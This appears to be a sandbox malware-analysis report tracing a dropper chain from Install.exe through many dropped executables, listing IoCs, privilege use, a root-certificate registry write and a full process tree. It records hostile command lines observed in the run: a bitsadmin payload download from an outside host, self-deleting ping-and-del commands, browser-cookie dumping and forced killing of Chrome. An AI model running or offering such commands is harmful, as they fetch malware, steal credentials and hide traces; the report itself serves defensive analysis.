Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Fyvicufaecae.exe

Runs ping.exe 1 TTPs 8 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

9392 PING.EXE
10072 PING.EXE
5880 PING.EXE
6728 PING.EXE
6552 PING.EXE
6988 PING.EXE
7536 PING.EXE
8180 PING.EXE

pid	process
9392	PING.EXE
10072	PING.EXE
5880	PING.EXE
6728	PING.EXE
6552	PING.EXE
6988	PING.EXE
7536	PING.EXE
8180	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	539	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	547	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	224	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	229	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	532	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	537	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ultramediaburner.tmpFazhasecusae.exe

pid	process
3420	ultramediaburner.tmp
3420	ultramediaburner.tmp
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe
2308	Fazhasecusae.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

3400 MicrosoftEdgeCP.exe
3400 MicrosoftEdgeCP.exe

pid	process
3400	MicrosoftEdgeCP.exe
3400	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

Ultra.exeFyvicufaecae.exeFazhasecusae.exeMicrosoftEdge.exeKiffMainE1.exeMicrosoftEdgeCP.exe828001925.exe

description	pid	process
Token: SeDebugPrivilege	4052	Ultra.exe
Token: SeDebugPrivilege	2972	Fyvicufaecae.exe
Token: SeDebugPrivilege	2308	Fazhasecusae.exe
Token: SeDebugPrivilege	4144	MicrosoftEdge.exe
Token: SeDebugPrivilege	4144	MicrosoftEdge.exe
Token: SeDebugPrivilege	4144	MicrosoftEdge.exe
Token: SeDebugPrivilege	4144	MicrosoftEdge.exe
Token: SeDebugPrivilege	5076	KiffMainE1.exe
Token: SeDebugPrivilege	4356	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4356	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4356	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4356	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4524	828001925.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

ultramediaburner.tmp

pid process

3420 ultramediaburner.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

4144 MicrosoftEdge.exe
3400 MicrosoftEdgeCP.exe
3400 MicrosoftEdgeCP.exe

pid	process
4144	MicrosoftEdge.exe
3400	MicrosoftEdgeCP.exe
3400	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

Install.exeInstall.tmpUltra.exeultramediaburner.exeultramediaburner.tmpFazhasecusae.execmd.execmd.execmd.exeMicrosoftEdgeCP.exesskiper.exe

description	pid	process	target process
PID 3988 wrote to memory of 1040	3988	Install.exe	Install.tmp
PID 3988 wrote to memory of 1040	3988	Install.exe	Install.tmp
PID 3988 wrote to memory of 1040	3988	Install.exe	Install.tmp
PID 1040 wrote to memory of 4052	1040	Install.tmp	Ultra.exe
PID 1040 wrote to memory of 4052	1040	Install.tmp	Ultra.exe
PID 4052 wrote to memory of 3736	4052	Ultra.exe	ultramediaburner.exe
PID 4052 wrote to memory of 3736	4052	Ultra.exe	ultramediaburner.exe
PID 4052 wrote to memory of 3736	4052	Ultra.exe	ultramediaburner.exe
PID 3736 wrote to memory of 3420	3736	ultramediaburner.exe	ultramediaburner.tmp
PID 3736 wrote to memory of 3420	3736	ultramediaburner.exe	ultramediaburner.tmp
PID 3736 wrote to memory of 3420	3736	ultramediaburner.exe	ultramediaburner.tmp
PID 4052 wrote to memory of 2972	4052	Ultra.exe	Fyvicufaecae.exe
PID 4052 wrote to memory of 2972	4052	Ultra.exe	Fyvicufaecae.exe
PID 3420 wrote to memory of 2132	3420	ultramediaburner.tmp	UltraMediaBurner.exe
PID 3420 wrote to memory of 2132	3420	ultramediaburner.tmp	UltraMediaBurner.exe
PID 4052 wrote to memory of 2308	4052	Ultra.exe	Fazhasecusae.exe
PID 4052 wrote to memory of 2308	4052	Ultra.exe	Fazhasecusae.exe
PID 2308 wrote to memory of 4640	2308	Fazhasecusae.exe	cmd.exe
PID 2308 wrote to memory of 4640	2308	Fazhasecusae.exe	cmd.exe
PID 4640 wrote to memory of 4808	4640	cmd.exe	sskiper.exe
PID 4640 wrote to memory of 4808	4640	cmd.exe	sskiper.exe
PID 4640 wrote to memory of 4808	4640	cmd.exe	sskiper.exe
PID 2308 wrote to memory of 4972	2308	Fazhasecusae.exe	cmd.exe
PID 2308 wrote to memory of 4972	2308	Fazhasecusae.exe	cmd.exe
PID 4972 wrote to memory of 5076	4972	cmd.exe	KiffMainE1.exe
PID 4972 wrote to memory of 5076	4972	cmd.exe	KiffMainE1.exe
PID 2308 wrote to memory of 4648	2308	Fazhasecusae.exe	cmd.exe
PID 2308 wrote to memory of 4648	2308	Fazhasecusae.exe	cmd.exe
PID 4648 wrote to memory of 4484	4648	cmd.exe	001.exe
PID 4648 wrote to memory of 4484	4648	cmd.exe	001.exe
PID 4648 wrote to memory of 4484	4648	cmd.exe	001.exe
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4808 wrote to memory of 4524	4808	sskiper.exe	828001925.exe
PID 4808 wrote to memory of 4524	4808	sskiper.exe	828001925.exe
PID 4808 wrote to memory of 4524	4808	sskiper.exe	828001925.exe
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3400 wrote to memory of 4356	3400	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3988

C:\Users\Admin\AppData\Local\Temp\is-M9KDM.tmp\Install.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M9KDM.tmp\Install.tmp" /SL5="$2010E,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1040

C:\Users\Admin\AppData\Local\Temp\is-JAOL2.tmp\Ultra.exe
"C:\Users\Admin\AppData\Local\Temp\is-JAOL2.tmp\Ultra.exe" /S /UID=burnerch1
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052

C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe
"C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3736

C:\Users\Admin\AppData\Local\Temp\is-1MUHM.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1MUHM.tmp\ultramediaburner.tmp" /SL5="$90052,281924,62464,C:\Program Files\Windows Photo Viewer\ONMFVFPQDZ\ultramediaburner.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3420

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
6⤵
- Executes dropped EXE
PID:2132

C:\Users\Admin\AppData\Local\Temp\47-e109e-c8b-6c899-13f99d561cee8\Fyvicufaecae.exe
"C:\Users\Admin\AppData\Local\Temp\47-e109e-c8b-6c899-13f99d561cee8\Fyvicufaecae.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2116
5⤵
PID:4756

C:\Users\Admin\AppData\Local\Temp\77-dc390-0e8-b78bc-f8388a0e088b5\Fazhasecusae.exe
"C:\Users\Admin\AppData\Local\Temp\77-dc390-0e8-b78bc-f8388a0e088b5\Fazhasecusae.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5wzm4trq.ini\sskiper.exe /s & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:4640

C:\Users\Admin\AppData\Local\Temp\5wzm4trq.ini\sskiper.exe
C:\Users\Admin\AppData\Local\Temp\5wzm4trq.ini\sskiper.exe /s
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4808

C:\Users\Admin\AppData\Local\Temp\828001925.exe
C:\Users\Admin\AppData\Local\Temp\828001925.exe
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
8⤵
PID:5636

C:\Users\Admin\AppData\Local\Temp\654075992.exe
C:\Users\Admin\AppData\Local\Temp\654075992.exe
7⤵
PID:5308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\5wzm4trq.ini\sskiper.exe & exit
7⤵
PID:6664

C:\Windows\SysWOW64\PING.EXE
ping 0
8⤵
- Runs ping.exe
PID:6728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0cd3aoh.uei\KiffMainE1.exe & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:4972

C:\Users\Admin\AppData\Local\Temp\c0cd3aoh.uei\KiffMainE1.exe
C:\Users\Admin\AppData\Local\Temp\c0cd3aoh.uei\KiffMainE1.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbmxocgf.dod\001.exe & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:4648

C:\Users\Admin\AppData\Local\Temp\cbmxocgf.dod\001.exe
C:\Users\Admin\AppData\Local\Temp\cbmxocgf.dod\001.exe
6⤵
- Executes dropped EXE
PID:4484

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\installer.exe /qn CAMPAIGN="654" & exit
5⤵
PID:4104

C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\installer.exe
C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\installer.exe /qn CAMPAIGN="654"
6⤵
PID:4484

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\psswoawz.1e0\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619883647 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
7⤵
PID:3912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ocda2akp.czz\gpooe.exe & exit
5⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\ocda2akp.czz\gpooe.exe
C:\Users\Admin\AppData\Local\Temp\ocda2akp.czz\gpooe.exe
6⤵
PID:5552

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:4172

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:5316

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aob2mpza.s0e\sskiper.exe /s & exit
5⤵
PID:5900

C:\Users\Admin\AppData\Local\Temp\aob2mpza.s0e\sskiper.exe
C:\Users\Admin\AppData\Local\Temp\aob2mpza.s0e\sskiper.exe /s
6⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\1096704559.exe
C:\Users\Admin\AppData\Local\Temp\1096704559.exe
7⤵
PID:5096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
8⤵
PID:1244

C:\Users\Admin\AppData\Local\Temp\605358738.exe
C:\Users\Admin\AppData\Local\Temp\605358738.exe
7⤵
PID:2668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\aob2mpza.s0e\sskiper.exe & exit
7⤵
PID:4936

C:\Windows\SysWOW64\PING.EXE
ping 0
8⤵
- Runs ping.exe
PID:6988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4dfxc5h.30k\google-game.exe & exit
5⤵
PID:5748

C:\Users\Admin\AppData\Local\Temp\o4dfxc5h.30k\google-game.exe
C:\Users\Admin\AppData\Local\Temp\o4dfxc5h.30k\google-game.exe
6⤵
PID:5572

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
7⤵
PID:2868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ri4c0eoz.h1k\askinstall39.exe & exit
5⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\ri4c0eoz.h1k\askinstall39.exe
C:\Users\Admin\AppData\Local\Temp\ri4c0eoz.h1k\askinstall39.exe
6⤵
PID:5088

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:5728

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:5136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yi1iniv5.iaz\y1.exe & exit
5⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\yi1iniv5.iaz\y1.exe
C:\Users\Admin\AppData\Local\Temp\yi1iniv5.iaz\y1.exe
6⤵
PID:5580

C:\Users\Admin\AppData\Local\Temp\IdQboelc8d.exe
"C:\Users\Admin\AppData\Local\Temp\IdQboelc8d.exe"
7⤵
PID:7068

C:\Users\Admin\AppData\Roaming\1620142976325.exe
"C:\Users\Admin\AppData\Roaming\1620142976325.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620142976325.txt"
8⤵
PID:6348

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\IdQboelc8d.exe"
8⤵
PID:5520

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
9⤵
- Runs ping.exe
PID:6552

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yi1iniv5.iaz\y1.exe"
7⤵
PID:7132

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
8⤵
- Delays execution with timeout.exe
PID:5800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\agip4cct.xro\setup.exe & exit
5⤵
PID:4560

C:\Users\Admin\AppData\Local\Temp\agip4cct.xro\setup.exe
C:\Users\Admin\AppData\Local\Temp\agip4cct.xro\setup.exe
6⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\agip4cct.xro\setup.exe"
7⤵
PID:6072

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
8⤵
- Runs ping.exe
PID:5880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe & exit
5⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe
6⤵
PID:6028

C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\qnz1m3zo.3pv\toolspab1.exe
7⤵
PID:5788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lam2sc2g.cbn\GcleanerWW.exe /mixone & exit
5⤵
PID:6600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\frez1g2k.l1i\SunLabsPlayer.exe /S & exit
5⤵
PID:6868

C:\Users\Admin\AppData\Local\Temp\frez1g2k.l1i\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\frez1g2k.l1i\SunLabsPlayer.exe /S
6⤵
PID:6932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:6280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:6752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:9200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:9600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:5888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:3884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:8232

C:\Windows\SysWOW64\bitsadmin.exe
"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
7⤵
- Download via BitsAdmin
PID:8876

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
7⤵
PID:4600

C:\Program Files (x86)\lighteningplayer\data_load.exe
"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p6HeFjZCP8gJJc0s -y x C:\zip.7z -o"C:\Program Files\temp_files\"
7⤵
PID:6256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:9448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:4108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoF69C.tmp\tempfile.ps1"
7⤵
PID:10036

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1l1lzebl.kyy\005.exe & exit
5⤵
PID:6984

C:\Users\Admin\AppData\Local\Temp\1l1lzebl.kyy\005.exe
C:\Users\Admin\AppData\Local\Temp\1l1lzebl.kyy\005.exe
6⤵
PID:7084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjofakrb.oy1\Setup3310.exe /Verysilent /subid=623 & exit
5⤵
PID:5764

C:\Users\Admin\AppData\Local\Temp\fjofakrb.oy1\Setup3310.exe
C:\Users\Admin\AppData\Local\Temp\fjofakrb.oy1\Setup3310.exe /Verysilent /subid=623
6⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\is-0GTJ2.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0GTJ2.tmp\Setup3310.tmp" /SL5="$903D0,138429,56832,C:\Users\Admin\AppData\Local\Temp\fjofakrb.oy1\Setup3310.exe" /Verysilent /subid=623
7⤵
PID:2284

C:\Users\Admin\AppData\Local\Temp\is-8SDT7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-8SDT7.tmp\Setup.exe" /Verysilent
8⤵
PID:6652

C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"
9⤵
PID:6752

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
10⤵
PID:6028

C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"
9⤵
PID:6744

C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
"C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"
9⤵
PID:6724

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
10⤵
PID:7372

C:\Windows\SysWOW64\taskkill.exe
taskkill /im RunWW.exe /f
11⤵
- Kills process with taskkill
PID:8016

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
11⤵
- Delays execution with timeout.exe
PID:7972

C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe
